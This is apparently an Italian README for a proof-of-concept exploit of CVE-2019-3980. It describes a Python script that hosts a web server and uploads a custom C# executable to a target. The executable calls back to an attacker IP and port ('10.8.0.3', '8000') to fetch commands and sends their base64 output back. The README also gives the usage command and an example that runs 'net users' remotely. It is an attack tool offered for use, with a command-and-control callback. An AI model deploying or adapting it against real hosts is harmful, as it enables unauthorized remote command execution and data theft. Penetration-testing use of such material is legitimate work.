
Exploit proof-of-concept per CVE-2019-3980 che permette l'esecuzione remota di comandi tramite payload C# personalizzato con callback HTTP per il recupero dell'output.
Questo repository è stato creato per utilizzare il POC di Nessus con un eseguibile C# personalizzato per eseguire comandi su un host remoto e ottenere l'output del comando.
Il file Python viene utilizzato per avviare un server web, eseguire l'exploit e poi ottenere i risultati tramite il server web.
L'eseguibile C# viene caricato tramite l'exploit sul target.
Quando viene eseguito sul target, l'exe richiama l'IP/Porta specificati per ottenere il comando da eseguire (il percorso è /cmd).
Una volta che il comando termina, l'exe invia l'output allo stesso server web.
L'invio dell'output avviene tramite una richiesta GET che genererà un 404, ma va bene così, vogliamo solo i dati in base64.
L'eseguibile C# ha due variabili che devono essere aggiornate
Queste variabili fanno riferimento all'IP e alla Porta del sistema attaccante
string ip = "10.8.0.3";
string port = "8000";
python dameware-poc.py -t target_ip -e executable_to_upload
L'esempio seguente esegue il comando net users sull'host remoto
